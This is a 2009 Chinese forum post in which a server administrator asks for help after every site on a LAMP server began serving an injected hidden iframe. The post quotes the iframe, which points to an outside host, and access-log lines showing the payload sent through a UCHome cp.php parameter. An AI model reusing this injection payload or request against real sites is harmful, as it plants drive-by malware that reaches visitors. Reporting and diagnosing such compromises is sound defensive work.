免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 3356 | 回复: 1
打印 上一主题 下一主题

求助:服务器被挂马,UCH有被攻击的迹象 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2009-09-24 09:56 |只看该作者 |倒序浏览
昨天服务器上所有的网站突然被挂上一段代码
  1. <iframe src=http://se362c.3322.org/jj/7.htm width=111 height=0 border=0></iframe>      
复制代码
首先排除了是本地网络的问题,在其他地方也出现相同的情况,而本地访问其他网站没有问题。\r\n所有在服务器上的文件都会出现那一行代码,包括404页面\r\n而直接在服务器上下载下来的文件上没有出现那一行代码\r\n如果把一个空的文件上传到服务器上,通过网络访问该文件,都会加上那一行代码\r\n\r\n查找日志时发现,日志1G多,日志中有两行是与该代码有关
  1. \r\nlogs/access_log:218.28.249.222 - - [23/Sep/2009:17:01:58 +0800] \"GET /cp.php?ac=relatekw&subjectenc=\\xc8\\xc3\\xd0\\xc4\\xc1\\xe9\\xb4\\xf8\\xd7\\xc5\\xce\\xd2\r\n\r\n\\xc3\\xc7\\xd7\\xdf\\xcf\\xf2\\xc0\\xed\\xcf\\xeb\\xb5\\xc4\\xc9\\xfa\\xbb\\xee\\xc8\\xc3\\xd0\\xc4\\xc1\\xe9\\xb4\\xf8\\xd7\\xc5\\xce\\xd2\\xc3\\xc7\\xd7\\xdf\\xcf\\xf2\\xc0\\xed\\xcf\\xeb\\xb5\r\n\r\n\\xc4\\xc9\\xfa\\xbb\\xee&messageenc=<IFRAME%20border=0%20src=\\\"http://se362c.3322.org/jj/7.htm\\\"%20width=111%20height=0></IFRAME><STYLE>body%20{%20font-\r\n\r\nsize:14px;%20line-height:1.8em;%20padding-right:%204px;%20padding-left:%208px;%20padding-bottom:%208px;%20margin:%200px;%20padding-top:%208px;%20}\r\n\r\n</STYLE><META%20content=\\\"mshtml%206.00.2900.3132\\\"%20name=generator>&inajax=1 HTTP/1.1\" 200 76\r\n\r\n\r\n\r\n\r\nlogs/access_log:218.28.249.222 - - [23/Sep/2009:17:02:01 +0800] \"GET /cp.php?ac=relatekw&subjectenc=\\xc8\\xc3\\xd0\\xc4\\xc1\\xe9\\xb4\\xf8\\xd7\\xc5\\xce\\xd2\r\n\r\n\\xc3\\xc7\\xd7\\xdf\\xcf\\xf2\\xc0\\xed\\xcf\\xeb\\xb5\\xc4\\xc9\\xfa\\xbb\\xee&messageenc=<IFRAME%20border=0%20src=\\\"http://se362c.3322.org/jj/7.htm\\\"%20width=111%\r\n\r\n20height=0></IFRAME><STYLE>body%20{%20font-size:14px;%20line-height:1.8em;%20padding-right:%204px;%20padding-left:%208px;%20padding-bottom:%208px;%\r\n\r\n20margin:%200px;%20padding-top:%208px;%20}</STYLE><META%20content=\\\"mshtml%206.00.2900.3132\\\"%20name=generator>&inajax=1 HTTP/1.1\" 200 76
复制代码
不知是否与UCH有关,请达人帮忙,感谢。\r\n\r\n服务器环境是Lamp

论坛徽章:
0
2 [报告]
发表于 2009-09-24 13:08 |只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP